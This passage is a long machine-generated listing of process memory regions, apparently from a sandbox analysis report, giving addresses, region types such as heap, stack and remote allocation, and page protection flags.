heap
page read and write
497000
unkown
page write copy
90E000
stack
page read and write
61B4000
heap
page read and write
18F7000
heap
page read and write
4656000
heap
page read and write
664A000
heap
page read and write
2B94000
heap
page read and write
53F000
heap
page read and write
1235000
heap
page read and write
506000
heap
page read and write
16070000
heap
page read and write
462B000
heap
page read and write
63D7000
heap
page read and write
2F00000
trusted library allocation
page read and write
6192000
heap
page read and write
623B000
heap
page read and write
5EE6000
heap
page read and write
2B52000
heap
page read and write
74B000
unkown
page execute and read and write
2E31000
heap
page read and write
5BEE000
stack
page read and write
4680000
heap
page read and write
E97000
unkown
page readonly
16FA000
stack
page read and write
46C1000
heap
page read and write
5705000
heap
page read and write
6513000
heap
page read and write
461D000
heap
page read and write
4689000
heap
page read and write
651D000
heap
page read and write
140506000
unkown
page execute and write copy
612F000
heap
page read and write
1081000
heap
page read and write
18A0000
direct allocation
page read and write
2AFFB05C000
heap
page read and write
5F0000
heap
page read and write
4680000
heap
page read and write
2B3F000
stack
page read and write
19CA000
heap
page read and write
140278000
unkown
page write copy
54C000
heap
page read and write
3671000
heap
page read and write
2B65000
heap
page read and write
5ED6000
heap
page read and write
5290000
heap
page read and write
652D000
heap
page read and write
525B000
heap
page read and write
790000
unkown
page execute and read and write
7FF8491E0000
trusted library allocation
page read and write
686C000
unkown
page read and write
60F5000
heap
page read and write
9C000
stack
page read and write
6189000
heap
page read and write
1590000
unkown
page write copy
15E20000
heap
page read and write
140506000
unkown
page execute and write copy
7FF849100000
trusted library allocation
page execute and read and write
40B000
unkown
page write copy
B8D6AFE000
unkown
page readonly
55DF000
heap
page read and write
65CF000
heap
page read and write
6713000
heap
page read and write
20201FE0000
trusted library allocation
page read and write
1C7000
heap
page read and write
554D000
stack
page read and write
65F3000
heap
page read and write
61C1000
heap
page read and write
515D000
trusted library allocation
page read and write
2B99000
heap
page read and write
3671000
heap
page read and write
6333000
heap
page read and write
398E000
stack
page read and write
5EEB000
heap
page read and write
724000
unkown
page execute and read and write
1076000
unkown
page execute and read and write
1230000
heap
page read and write
2EE7000
trusted library allocation
page read and write
73A000
unkown
page execute and read and write
5430000
trusted library section
page read and write
554000
heap
page read and write
6209000
heap
page read and write
2DA8000
trusted library allocation
page read and write
30DF000
stack
page read and write
7FF84913B000
trusted library allocation
page read and write
65FD000
heap
page read and write
1035000
heap
page read and write
2D85000
trusted library allocation
page read and write
6591000
heap
page read and write
6283000
heap
page read and write
61C1000
heap
page read and write
35AD0000
heap
page read and write
5C60000
heap
page read and write
7FF848E03000
trusted library allocation
page execute and read and write
16EE000
stack
page read and write
E10000
heap
page read and write
2E81000
heap
page read and write
4350000
heap
page read and write
32B1000
heap
page read and write
2F52000
trusted library allocation
page read and write
2B88000
heap
page read and write
61C1000
heap
page read and write
515F000
heap
page read and write
6591000
heap
page read and write
6119000
heap
page read and write
39E0000
heap
page read and write
53F000
heap
page read and write
61B4000
heap
page read and write
1312000
heap
page read and write
22365000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
65B1000
heap
page read and write
3671000
heap
page read and write
14037A000
unkown
page execute and write copy
5E88000
heap
page read and write
17C2000
heap
page read and write
11B4000
heap
page read and write
3671000
heap
page read and write
679EA000
unkown
page read and write
730F000
stack
page read and write
6241000
heap
page read and write
65BC000
heap
page read and write
5134000
heap
page read and write
4651000
heap
page read and write
528D000
heap
page read and write
1072000
heap
page read and write
423000
unkown
page read and write
5F50000
remote allocation
page read and write
523A000
heap
page read and write
1949000
heap
page read and write
7FF848FB4000
trusted library allocation
page execute and read and write
46B7000
heap
page read and write
6798000
heap
page read and write
53F000
heap
page read and write
4CEC000
stack
page read and write
6274000
heap
page read and write
57F5000
heap
page read and write
478E000
heap
page read and write
1404AE000
unkown
page execute and write copy
465C000
heap
page read and write
7E8AF7D000
stack
page read and write
59C000
unkown
page execute and read and write
11F0000
unkown
page execute read
5800000
trusted library allocation
page execute and read and write
62B8000
heap
page read and write
4641000
heap
page read and write
1BFE000
heap
page read and write
554000
heap
page read and write
1A61000
heap
page read and write
2E81000
trusted library allocation
page read and write
2E31000
heap
page read and write
50F0000
heap
page read and write
2748000
heap
page read and write
618D000
heap
page read and write
2B93000
heap
page read and write
408000
unkown
page readonly
400000
unkown
page readonly
1404A2000
unkown
page execute and write copy
60F5000
heap
page read and write
463C000
heap
page read and write
62B8000
heap
page read and write
514E000
trusted library allocation
page read and write
2E4E3000
heap
page read and write
561000
heap
page read and write
6649000
heap
page read and write
5DEE000
stack
page read and write
2B90000
heap
page read and write
5E7D000
heap
page read and write
3671000
heap
page read and write
2BA1000
heap
page read and write
2E3A000
trusted library allocation
page read and write
463B000
heap
page read and write
6281000
heap
page read and write
2236F000
heap
page read and write
5D0000
heap
page read and write
61E7000
heap
page read and write
2BC0000
trusted library allocation
page read and write
13D6A487000
heap
page read and write
4771000
heap
page read and write
46C1000
heap
page read and write
6104000
heap
page read and write
60F5000
heap
page read and write
5AA6000
heap
page read and write
2E72000
trusted library allocation
page read and write
62B8000
heap
page read and write
FDA000
heap
page read and write
2E31000
heap
page read and write
2B51000
heap
page read and write
782B000
stack
page read and write
61D0000
trusted library allocation
page read and write
7FF848EB0000
trusted library allocation
page read and write
2E31000
heap
page read and write
7FF8490C6000
trusted library allocation
page read and write
7FF849128000
trusted library allocation
page read and write
66BB000
heap
page read and write
32B1000
heap
page read and write
664A000
heap
page read and write
659E000
heap
page read and write
192D000
heap
page read and write
422000
unkown
page write copy
7BBD000
stack
page read and write
592F000
stack
page read and write
1AF0000
heap
page read and write
613F000
heap
page read and write
B70000
heap
page read and write
185DCA7C000
heap
page read and write
14050C000
unkown
page execute and write copy
191000
stack
page read and write
46D000
stack
page read and write
514000
unkown
page execute and write copy
61B4000
heap
page read and write
6BE000
heap
page read and write
613E000
heap
page read and write
1674000
heap
page read and write
140278000
unkown
page write copy
840000
unkown
page execute and read and write
7FF8490A9000
trusted library allocation
page read and write
6103000
heap
page read and write
51C0000
trusted library section
page read and write
6532000
heap
page read and write
462B000
heap
page read and write
652E000
heap
page read and write
4680000
heap
page read and write
11B4000
heap
page read and write
3671000
heap
page read and write
7FF849087000
trusted library allocation
page read and write
28421000
heap
page read and write
19C000
stack
page read and write
1E69000
heap
page read and write
61E7000
heap
page read and write
1EAA000
heap
page read and write
32B1000
heap
page read and write
19C6000
heap
page read and write
140548000
unkown
page execute and write copy
61D0000
trusted library allocation
page read and write
5E7D000
heap
page read and write
1674000
heap
page read and write
5E7D000
heap
page read and write
623B000
heap
page read and write
11AE000
heap
page read and write
5B30000
heap
page execute and read and write
6290000
heap
page read and write
46C1000
heap
page read and write
2B0000
unkown
page readonly
2EB7000
trusted library allocation
page read and write
61C9000
heap
page read and write
6119000
heap
page read and write
2E8B000
trusted library allocation
page read and write
46C2000
heap
page read and write
61F9000
heap
page read and write
6511000
heap
page read and write
40A000
unkown
page write copy
E05000
trusted library allocation
page execute and read and write
134AE000
stack
page read and write
5CFF000
stack
page read and write
44B000
unkown
page execute and read and write
5E5D000
heap
page read and write
2B93000
heap
page read and write
61EA000
heap
page read and write
623B000
heap
page read and write
13AE000
heap
page read and write
1650000
direct allocation
page read and write
2AF90001000
trusted library allocation
page read and write
2B5F000
heap
page read and write
2B8D000
heap
page read and write
419000
unkown
page write copy
61D1000
heap
page read and write
149E000
heap
page read and write
1C170000
heap
page read and write
6524000
heap
page read and write
6467000
heap
page read and write
32B1000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
2E58000
trusted library allocation
page read and write
1363000
heap
page read and write
22344000
heap
page read and write
1404FC000
unkown
page execute and write copy
6104000
heap
page read and write
170C000
heap
page read and write
61FB000
heap
page read and write
5E65000
heap
page read and write
E92000
unkown
page readonly
1351000
heap
page read and write
19F9000
unkown
page readonly
2E6A000
trusted library allocation
page read and write
3870000
heap
page read and write
5CEE000
stack
page read and write
34AD000
stack
page read and write
6536000
heap
page read and write
1340000
trusted library allocation
page read and write
3671000
heap
page read and write
61D1000
heap
page read and write
2B84000
heap
page read and write
2FDE000
stack
page read and write
38ED000
stack
page read and write
6590000
trusted library allocation
page read and write
2DA0000
direct allocation
page read and write
2F30000
trusted library allocation
page read and write
2E31000
heap
page read and write
5F4A000
heap
page read and write
56E000
heap
page read and write
6180000
heap
page read and write
61E4000
heap
page read and write
7FF848FA2000
trusted library allocation
page read and write
663B000
heap
page read and write
5E6A000
heap
page read and write
61D0000
trusted library allocation
page read and write
1757000
heap
page read and write
33BE000
stack
page read and write
3ED2000
heap
page read and write
2E31000
heap
page read and write
525000
remote allocation
page execute and read and write
103F000
heap
page read and write
6125000
heap
page read and write
5E7D000
heap
page read and write
22350000
heap
page read and write
5E7D000
heap
page read and write
622E000
heap
page read and write
32B1000
heap
page read and write
61C1000
heap
page read and write
164E000
stack
page read and write
BF0000
heap
page read and write
1608E000
heap
page read and write
1054000
heap
page read and write
390C000
trusted library allocation
page read and write
2EB9000
trusted library allocation
page read and write
6131000
heap
page read and write
7FF849220000
trusted library allocation
page read and write
61E5000
heap
page read and write
5E4B000
heap
page read and write
61C9000
heap
page read and write
5E86000
heap
page read and write
627F000
heap
page read and write
465D000
heap
page read and write
6515000
heap
page read and write
423000
unkown
page read and write
73D000
unkown
page execute and read and write
6124000
heap
page read and write
5713000
heap
page read and write
32B1000
heap
page read and write
653F000
heap
page read and write
430000
heap
page read and write
2C79000
trusted library allocation
page read and write
381000
unkown
page execute read
5E7D000
heap
page read and write
60F7000
heap
page read and write
4675000
heap
page read and write
7DA000
unkown
page execute and read and write
13EB000
stack
page read and write
1234000
heap
page read and write
2E31000
heap
page read and write
679E3000
unkown
page write copy
556B000
heap
page read and write
5981000
heap
page read and write
5131000
heap
page read and write
54C6000
heap
page read and write
2BA0000
heap
page read and write
65B2000
heap
page read and write
61E0000
heap
page read and write
5F4F000
heap
page read and write
400000
unkown
page execute and read and write
6274000
heap
page read and write
2B94000
heap
page read and write
283C2000
heap
page read and write
1A10000
heap
page read and write
60F8000
heap
page read and write
1DDC000
unkown
page readonly
617A000
heap
page read and write
17B0000
heap
page read and write
4784000
heap
page read and write
676C000
stack
page read and write
6255000
heap
page read and write
6544000
heap
page read and write
2F2D000
trusted library allocation
page read and write
1140000
direct allocation
page read and write
62A3000
heap
page read and write
627B000
heap
page read and write
50D0000
trusted library allocation
page read and write
5E7D000
heap
page read and write
6156000
heap
page read and write
61D8000
heap
page read and write
22371000
heap
page read and write
B4C000
stack
page read and write
65DB000
heap
page read and write
61D8000
heap
page read and write
2E81000
heap
page read and write
22352000
heap
page read and write
2BA2000
heap
page read and write
542E000
stack
page read and write
65C2000
heap
page read and write
1404AC000
unkown
page execute and write copy
5E89000
heap
page read and write
62B8000
heap
page read and write
46FA000
heap
page read and write
535A000
heap
page read and write
5B6A000
heap
page read and write
6339000
heap
page read and write
6510000
trusted library allocation
page read and write
1F0000
direct allocation
page read and write
54C2000
heap
page read and write
2091000
heap
page read and write
2B95000
heap
page read and write
65C3000
heap
page read and write
401000
unkown
page execute read
62B8000
heap
page read and write
46A7000
heap
page read and write
60F3000
heap
page read and write
13D6A802000
heap
page read and write
171B000
heap
page read and write
6F8D000
stack
page read and write
61CA000
heap
page read and write
6104000
heap
page read and write
7FF848FAD000
trusted library allocation
page execute and read and write
F80000
trusted library allocation
page read and write
65D2000
heap
page read and write
613E000
heap
page read and write
7FF8491B0000
trusted library allocation
page read and write
2B3D000
trusted library allocation
page read and write
2B9C000
heap
page read and write
7FF848F20000
trusted library allocation
page execute and read and write
618A000
heap
page read and write
1C3C000
heap
page read and write
16F0000
heap
page read and write
6590000
trusted library allocation
page read and write
3671000
heap
page read and write
9BAE000
stack
page read and write
15B4C000
stack
page read and write
1357000
heap
page read and write
7FF8490D4000
trusted library allocation
page read and write
1403D3000
unkown
page execute and write copy
2847B000
heap
page read and write
61D8000
heap
page read and write
2BA0000
heap
page read and write
5E5D000
heap
page read and write
3671000
heap
page read and write
61D6000
heap
page read and write
61C1000
heap
page read and write
2B0000
unkown
page readonly
60F8000
heap
page read and write
32B1000
heap
page read and write
2236C000
heap
page read and write
E92000
unkown
page readonly
67941000
unkown
page execute read
5E63000
heap
page read and write
2236C000
heap
page read and write
3671000
heap
page read and write
5A6D000
stack
page read and write
11DA000
heap
page read and write
1290000
direct allocation
page read and write
13C000
unkown
page readonly
1738000
heap
page read and write
13D6A43B000
heap
page read and write
3671000
heap
page read and write
6591000
heap
page read and write
19BE000
heap
page read and write
65CF000
heap
page read and write
18A0000
direct allocation
page read and write
4680000
heap
page read and write
61C1000
heap
page read and write
51B0000
trusted library allocation
page read and write
6539000
heap
page read and write
B7E000
heap
page read and write
56EB000
heap
page read and write
1650000
direct allocation
page read and write
1404A6000
unkown
page execute and write copy
B7A000
heap
page read and write
6741000
heap
page read and write
664A000
heap
page read and write
54CC000
heap
page read and write
401000
unkown
page execute read
1135000
unkown
page execute and write copy
56E000
heap
page read and write
6592000
heap
page read and write
46AF000
heap
page read and write
515000
unkown
page readonly
65B0000
heap
page read and write
618D000
heap
page read and write
2234B000
heap
page read and write
61C1000
heap
page read and write
3671000
heap
page read and write
571C000
heap
page read and write
550000
heap
page read and write
16A0000
heap
page read and write
5134000
heap
page read and write
5E6A000
heap
page read and write
3671000
heap
page read and write
1234000
heap
page read and write
63E4000
heap
page read and write
2F50000
direct allocation
page read and write
1B93000
heap
page read and write
65B0000
heap
page read and write
32B1000
heap
page read and write
3DB0000
heap
page read and write
2236C000
heap
page read and write
30E0000
direct allocation
page read and write
185DCA31000
heap
page read and write
5EA0000
heap
page read and write
2DF3000
trusted library allocation
page read and write
6274000
heap
page read and write
9C000
stack
page read and write
5E88000
heap
page read and write
62B8000
heap
page read and write
5E86000
heap
page read and write
13BA000
heap
page read and write
62C8000
heap
page read and write
1220000
heap
page read and write
B78000
unkown
page execute and read and write
32B1000
heap
page read and write
4636000
heap
page read and write
6590000
trusted library allocation
page read and write
659B000
heap
page read and write
EF0000
trusted library allocation
page read and write
4680000
heap
page read and write
6119000
heap
page read and write
61B4000
heap
page read and write
6563000
heap
page read and write
66BB000
heap
page read and write
2B3B000
heap
page read and write
474D000
heap
page read and write
1120000
heap
page read and write
5AD1000
heap
page read and write
5E61000
heap
page read and write
54C000
heap
page read and write
102B000
unkown
page execute and read and write
4659000
heap
page read and write
56C000
remote allocation
page execute and read and write
5E61000
heap
page read and write
46A7000
heap
page read and write
1925000
heap
page read and write
3570000
heap
page read and write
6591000
heap
page read and write
6717000
heap
page read and write
5444000
heap
page read and write
2DEF000
trusted library allocation
page read and write
6320000
heap
page read and write
1B93000
heap
page read and write
12CE000
heap
page read and write
61C9000
heap
page read and write
2E4E1000
heap
page read and write
6290000
heap
page read and write
45E6000
heap
page read and write
1234000
heap
page read and write
6104000
heap
page read and write
6454000
heap
page read and write
6277000
heap
page read and write
6510000
trusted library allocation
page read and write
606B000
heap
page read and write
51B1000
heap
page read and write
CF7000
stack
page read and write
2D72000
trusted library allocation
page read and write
5EEB000
heap
page read and write
62B8000
heap
page read and write
E4B000
unkown
page execute and read and write
DD0000
trusted library allocation
page read and write
46E7000
heap
page read and write
CEF000
stack
page read and write
2EED000
trusted library allocation
page read and write
E72000
unkown
page read and write
6281000
heap
page read and write
4680000
heap
page read and write
4AFF000
heap
page read and write
5A80000
heap
page read and write
2234B000
heap
page read and write
14049A000
unkown
page execute and write copy
6283000
heap
page read and write
4C7677E000
unkown
page readonly
E85CFFF000
stack
page read and write
423D000
stack
page read and write
632E000
heap
page read and write
2A10000
heap
page read and write
2234C000
heap
page read and write
1B4E000
heap
page read and write
6104000
heap
page read and write
5E8B000
heap
page read and write
46E7000
heap
page read and write
F00000
trusted library allocation
page read and write
2B90000
heap
page read and write
32C0000
heap
page read and write
2B99000
heap
page read and write
2F27000
trusted library allocation
page read and write
2B62000
heap
page read and write
6521000
heap
page read and write
5FE5000
heap
page read and write
2E87000
trusted library allocation
page read and write
6124000
heap
page read and write
F3E000
stack
page read and write
140214000
unkown
page execute and read and write
6131000
heap
page read and write
2ED4000
trusted library allocation
page read and write
6BA000
heap
page read and write
2F67000
trusted library allocation
page read and write
1317000
heap
page read and write
61CA000
heap
page read and write
543C000
stack
page read and write
6534000
heap
page read and write
2E31000
heap
page read and write
1BC5000
heap
page read and write
1C28A000
heap
page read and write
6283000
heap
page read and write
E90000
unkown
page read and write
34560000
heap
page read and write
140502000
unkown
page execute and write copy
6134000
heap
page read and write
5BFE000
stack
page read and write
2E83000
trusted library allocation
page read and write
2DD6000
trusted library allocation
page read and write
4632000
heap
page read and write
15D26000
heap
page read and write
1404A0000
unkown
page execute and write copy
3671000
heap
page read and write
420000
unkown
page write copy
2E31000
heap
page read and write
4647000
heap
page read and write
478E000
heap
page read and write
2B8B000
heap
page read and write
1210000
trusted library allocation
page read and write
45E2000
heap
page read and write
1F0000
direct allocation
page read and write
6131000
heap
page read and write
13BB000
heap
page read and write
1F0000
direct allocation
page read and write
2B88000
heap
page read and write
663B000
heap
page read and write
513E000
heap
page read and write
6281000
heap
page read and write
6516000
heap
page read and write
46C1000
heap
page read and write
9D0000
heap
page read and write
61C9000
heap
page read and write
2B94000
heap
page read and write
45B000
heap
page read and write
6119000
heap
page read and write
6287000
heap
page read and write
13BA000
heap
page read and write
6119000
heap
page read and write
618A000
heap
page read and write
140000000
unkown
page readonly
1346000
heap
page read and write
6202000
heap
page read and write
68F000
heap
page read and write
2E4DB000
heap
page read and write
618B000
heap
page read and write
47AD000
heap
page read and write
450000
heap
page read and write
13D6A700000
heap
page read and write
6281000
heap
page read and write
2E31000
heap
page read and write
2B5E000
heap
page read and write
3660000
heap
page read and write
191A000
heap
page read and write
3671000
heap
page read and write
652D000
heap
page read and write
613E000
heap
page read and write
618A000
heap
page read and write
61EF000
heap
page read and write
1068000
unkown
page execute and read and write
62A8000
heap
page read and write
400000
unkown
page readonly
1AEC000
heap
page read and write
61C1000
heap
page read and write
786C000
heap
page read and write
6138000
heap
page read and write
5F45000
heap
page read and write
477F000
heap
page read and write
465F000
heap
page read and write
6E1000
unkown
page execute and read and write
13D6A477000
unkown
page read and write
2E31000
heap
page read and write
665A000
heap
page read and write
513E000
heap
page read and write
14D5000
heap
page read and write
5EFB000
heap
page read and write
2ACE000
stack
page read and write
53F000
heap
page read and write
2D4F000
trusted library allocation
page read and write
510B000
heap
page read and write
61D9000
heap
page read and write
1940000
heap
page read and write
EED000
trusted library allocation
page execute and read and write
61EA000
heap
page read and write
6190000
heap
page read and write
1240000
trusted library allocation
page read and write
7FF848E04000
trusted library allocation
page read and write
14037A000
unkown
page execute and write copy
6104000
heap
page read and write
32B1000
heap
page read and write
1939000
heap
page read and write
131A000
heap
page read and write
664B000
heap
page read and write
3671000
heap
page read and write
73E5000
heap
page read and write
FB4000
heap
page read and write
5254000
heap
page read and write
2E31000
heap
page read and write
629D000
heap
page read and write
1FA0000
remote allocation
page read and write
13A000
unkown
page execute and read and write
54CA000
heap
page read and write
1290000
direct allocation
page read and write
6151000
heap
page read and write
50F2000
heap
page read and write
2DBF000
trusted library allocation
page read and write
101F000
unkown
page execute and read and write
6288000
heap
page read and write
411000
unkown
page readonly
4640000
heap
page read and write
5B70000
heap
page read and write
FE4000
heap
page read and write
61C9000
heap
page read and write
66BB000
heap
page read and write
430000
unkown
page readonly
1E7F000
heap
page read and write
5D6F000
stack
page read and write
4787000
heap
page read and write
1EB0000
heap
page read and write
618A000
heap
page read and write
BC0000
heap
page read and write
46AE000
heap
page read and write
1EAA000
heap
page read and write
525B000
heap
page read and write
61B4000
heap
page read and write
6511000
heap
page read and write
6649000
heap
page read and write
14050C000
unkown
page execute and write copy
464E000
heap
page read and write
663B000
heap
page read and write
4C762DB000
stack
page read and write
2236C000
heap
page read and write
6124000
heap
page read and write
2236B000
heap
page read and write
550000
heap
page read and write
1290000
direct allocation
page read and write
5ED6000
heap
page read and write
3460000
heap
page read and write
1404A4000
unkown
page execute and write copy
529C000
heap
page read and write
24C0000
trusted library allocation
page read and write
513F000
heap
page read and write
613F000
heap
page read and write
7FF8491D0000
trusted library allocation
page read and write
62A9000
heap
page read and write
5E5A000
heap
page read and write
785C000
heap
page read and write
1B13000
heap
page read and write
2AFFCBD0000
trusted library allocation
page read and write
2D8B000
trusted library allocation
page read and write
5286000
heap
page read and write
185DD150000
trusted library allocation
page read and write
45FC000
heap
page read and write
54C000
heap
page read and write
476C000
stack
page read and write
427000
unkown
page readonly
2E38000
trusted library allocation
page read and write
61F8000
heap
page read and write
2B8D000
heap
page read and write
618D000
heap
page read and write
1BE6000
heap
page read and write
30F0000
direct allocation
page read and write
420000
unkown
page read and write
13AE000
heap
page read and write
10A7000
heap
page read and write
618D000
heap
page read and write
15FE000
stack
page read and write
4787000
heap
page read and write
18A0000
direct allocation
page read and write
2E89000
trusted library allocation
page read and write
14053A000
unkown
page execute and write copy
63A0000
heap
page read and write
32B1000
heap
page read and write
6274000
heap
page read and write
3FBE000
stack
page read and write
6654000
heap
page read and write
61AD000
heap
page read and write
6119000
heap
page read and write
2E81000
heap
page read and write
2AFFAFD5000
heap
page read and write
4625000
heap
page read and write
372E000
stack
page read and write
2744000
heap
page read and write
46C1000
heap
page read and write
466E000
heap
page read and write
2B95000
heap
page read and write
53F000
heap
page read and write
6131000
heap
page read and write
1674000
heap
page read and write
4659000
heap
page read and write
140506000
unkown
page execute and write copy
2DA0000
direct allocation
page read and write
515F000
heap
page read and write
9CC000
unkown
page execute read
6297000
heap
page read and write
605B000
heap
page read and write
5100000
heap
page execute and read and write
5286000
heap
page read and write
4787000
heap
page read and write
101B000
unkown
page execute and read and write
1F0000
direct allocation
page read and write
DE2000
trusted library allocation
page read and write
F80000
trusted library allocation
page execute and read and write
4656000
heap
page read and write
51AF000
heap
page read and write
2234C000
heap
page read and write
6287000
heap
page read and write
1F9F000
stack
page read and write
4C766FE000
stack
page read and write
1BBDF000
stack
page read and write
5E7D000
heap
page read and write
13E6000
heap
page read and write
6291000
heap
page read and write
1F0000
direct allocation
page read and write
2AF801C1000
trusted library allocation
page read and write
61F6000
heap
page read and write
401000
unkown
page execute read
3671000
heap
page read and write
620000
heap
page read and write
4675000
heap
page read and write
1351000
heap
page read and write
61C1000
heap
page read and write
4689000
heap
page read and write
5E89000
heap
page read and write
274D000
heap
page read and write
2F4E000
trusted library allocation
page read and write
5110000
heap
page read and write
2234B000
heap
page read and write
618D000
heap
page read and write
61E5000
heap
page read and write
613E000
heap
page read and write
1BC2E000
stack
page read and write
654A000
heap
page read and write
6653000
heap
page read and write
2D47000
trusted library allocation
page read and write
400000
unkown
page readonly
61C9000
heap
page read and write
1FF8000
direct allocation
page read and write
5E5F000
heap
page read and write
6124000
heap
page read and write
5E40000
heap
page read and write
62B8000
heap
page read and write
6131000
heap
page read and write
61D8000
heap
page read and write
9B000
stack
page read and write
550000
heap
page read and write
5620000
heap
page read and write
1FA0000
remote allocation
page read and write
5E6A000
heap
page read and write
463F000
heap
page read and write
E85FC7C000
stack
page read and write
46B7000
heap
page read and write
10EEE000
stack
page read and write
2AFFAFF0000
trusted library allocation
page read and write
5C67000
heap
page read and write
7FF849118000
trusted library allocation
page read and write
561000
heap
page read and write
628A000
heap
page read and write
6654000
heap
page read and write
468A000
heap
page read and write
140508000
unkown
page execute and write copy
11B4000
heap
page read and write
2EB1000
trusted library allocation
page read and write
5E8C000
heap
page read and write
3640000
remote allocation
page read and write
618D000
heap
page read and write
5E7C000
heap
page read and write
15D10000
heap
page read and write
14050A000
unkown
page execute and write copy
61C9000
heap
page read and write
61F9000
heap
page read and write
61FA000
heap
page read and write
1290000
direct allocation
page read and write
1404B4000
unkown
page execute and read and write
41B000
unkown
page readonly
3CDC000
trusted library allocation
page read and write
60AE000
heap
page read and write
2AFFAF70000
heap
page read and write
5170000
trusted library allocation
page read and write
6125000
heap
page read and write
19C6000
heap
page read and write
6296000
heap
page read and write
6152000
heap
page read and write
F70000
trusted library allocation
page execute and read and write
2B69000
heap
page read and write
61F6000
heap
page read and write
26A2EC60000
remote allocation
page read and write
6B16000
heap
page read and write
2DD0000
remote allocation
page read and write
61C9000
heap
page read and write
6121000
heap
page read and write
580000
unkown
page execute and read and write
46B7000
heap
page read and write
4680000
heap
page read and write
2E7F000
trusted library allocation
page read and write
B8D637E000
stack
page read and write
1BE90000
direct allocation
page execute and read and write
62A2000
heap
page read and write
1C181000
heap
page read and write
2AF801A9000
trusted library allocation
page read and write
573E000
stack
page read and write
62FD000
heap
page read and write
1019000
unkown
page execute and read and write
13AE000
stack
page read and write
652E000
heap
page read and write
5610000
heap
page read and write
2F48000
trusted library allocation
page read and write
7FF8491C0000
trusted library allocation
page read and write
52E0000
heap
page read and write
6131000
heap
page read and write
450000
heap
page read and write
2D89000
trusted library allocation
page read and write
517D000
heap
page read and write
2E31000
heap
page read and write
2DA0000
direct allocation
page read and write
140498000
unkown
page execute and write copy
2D14000
trusted library allocation
page read and write
62C9000
heap
page read and write
6324000
heap
page read and write
62A9000
heap
page read and write
5C52000
heap
page read and write
2DB5000
trusted library allocation
page read and write
2AFFAF50000
heap
page read and write
609E000
heap
page read and write
14049E000
unkown
page execute and write copy
6510000
trusted library allocation
page read and write
32B1000
heap
page read and write
283DE000
heap
page read and write
6553000
heap
page read and write
1F0000
direct allocation
page read and write
5E8C000
heap
page read and write
6299000
heap
page read and write
33FE000
stack
page read and write
36A0000
heap
page read and write
140208000
unkown
page execute and read and write
6183000
heap
page read and write
2AFFB09C000
heap
page read and write
5E6A000
heap
page read and write
65D0000
heap
page read and write
2E9E000
trusted library allocation
page read and write
515F000
heap
page read and write
6132000
heap
page read and write
2E31000
heap
page read and write
E77000
unkown
page readonly
46C7000
heap
page read and write
5EE7000
heap
page read and write
FA0000
trusted library allocation
page read and write
1360000
heap
page read and write
20202102000
heap
page read and write
474D000
heap
page read and write
50C1000
heap
page read and write
1674000
heap
page read and write
2AFFD316000
heap
page read and write
41FB000
stack
page read and write
47A3000
heap
page read and write
6208000
heap
page read and write
2BCF000
trusted library allocation
page read and write
6255000
heap
page read and write
6144000
heap
page read and write
19B3000
heap
page read and write
554000
heap
page read and write
61F6000
heap
page read and write
1EB0000
heap
page read and write
597F000
stack
page read and write
E7D000
unkown
page readonly
2B8D000
heap
page read and write
621F000
heap
page read and write
140502000
unkown
page execute and write copy
32B1000
heap
page read and write
5E86000
heap
page read and write
50C1000
heap
page read and write
130B000
heap
page read and write
5640000
heap
page read and write
466E000
heap
page read and write
55E0000
heap
page read and write
22330000
heap
page read and write
2F7C000
trusted library allocation
page read and write
32B1000
heap
page read and write
5E61000
heap
page read and write
50C0000
trusted library allocation
page read and write
2E31000
heap
page read and write
1BE2000
heap
page read and write
6526000
heap
page read and write
2236C000
heap
page read and write
199F000
stack
page read and write
663B000
heap
page read and write
5E89000
heap
page read and write
53E0000
trusted library allocation
page read and write
53F000
heap
page read and write
10F3000
heap
page read and write
6195000
heap
page read and write
E1000
unkown
page execute read
596E000
stack
page read and write
6202000
heap
page read and write
6209000
heap
page read and write
2E31000
heap
page read and write
1360000
heap
page read and write
464E000
heap
page read and write
433D000
stack
page read and write
62A2000
heap
page read and write
3671000
heap
page read and write
61B4000
heap
page read and write
61CA000
heap
page read and write
6FCA000
heap
page read and write
6510000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page read and write
63F0000
trusted library allocation
page read and write
323F000
stack
page read and write
6195000
heap
page read and write
4680000
heap
page read and write
1650000
direct allocation
page read and write
53F000
heap
page read and write
5E8B000
heap
page read and write
41B000
unkown
page readonly
1674000
heap
page read and write
5E97000
heap
page read and write
13AE000
heap
page read and write
7FF849240000
trusted library allocation
page read and write
377D000
stack
page read and write
1674000
heap
page read and write
32B1000
heap
page read and write
6202000
heap
page read and write
1207000
heap
page read and write
22299000
heap
page read and write
5C0000
heap
page read and write
4641000
heap
page read and write
118E000
heap
page read and write
2233D000
heap
page read and write
13D6A43A000
unkown
page read and write
51C7000
heap
page read and write
133C000
heap
page read and write
2DF7000
trusted library allocation
page read and write
14049C000
unkown
page execute and write copy
1F0000
direct allocation
page read and write
6464000
heap
page read and write
65AD000
heap
page read and write
60F5000
heap
page read and write
1360000
heap
page read and write
6541000
heap
page read and write
1346000
heap
page read and write
2ED7000
trusted library allocation
page read and write
19AF000
heap
page read and write
2E51000
trusted library allocation
page read and write
B8D66FE000
unkown
page readonly
6104000
heap
page read and write
6532000
heap
page read and write
32C1000
heap
page read and write
2D79000
trusted library allocation
page read and write
65D1000
heap
page read and write
6B0000
heap
page read and write
E85E47E000
stack
page read and write
577B000
heap
page read and write
1234000
heap
page read and write
3671000
heap
page read and write
2B62000
heap
page read and write
545000
unkown
page readonly
4689000
heap
page read and write
67940000
unkown
page readonly
5EEF000
heap
page read and write
1F0000
direct allocation
page read and write
5C6D000
stack
page read and write
24C0000
trusted library allocation
page read and write
1290000
direct allocation
page read and write
4B1F000
heap
page read and write
6CD000
heap
page read and write
6131000
heap
page read and write
6564000
heap
page read and write
13BA000
heap
page read and write
63AC000
heap
page read and write
7FF848FC0000
trusted library allocation
page read and write
140498000
unkown
page execute and write copy
6591000
heap
page read and write
5EB8000
heap
page read and write
1234000
heap
page read and write
32A0000
heap
page read and write
401000
unkown
page execute read
2236C000
heap
page read and write
1B98E000
stack
page read and write
6124000
heap
page read and write
15A4C000
stack
page read and write
623B000
heap
page read and write
2B47000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
5E86000
heap
page read and write
4641000
heap
page read and write
45EE000
heap
page read and write
6527000
heap
page read and write
1330000
heap
page read and write
2AFFDD60000
heap
page read and write
5286000
heap
page read and write
2E31000
heap
page read and write
65B2000
heap
page read and write
2E31000
heap
page read and write
1650000
direct allocation
page read and write
20201FB0000
heap
page read and write
46B7000
heap
page read and write
659E000
heap
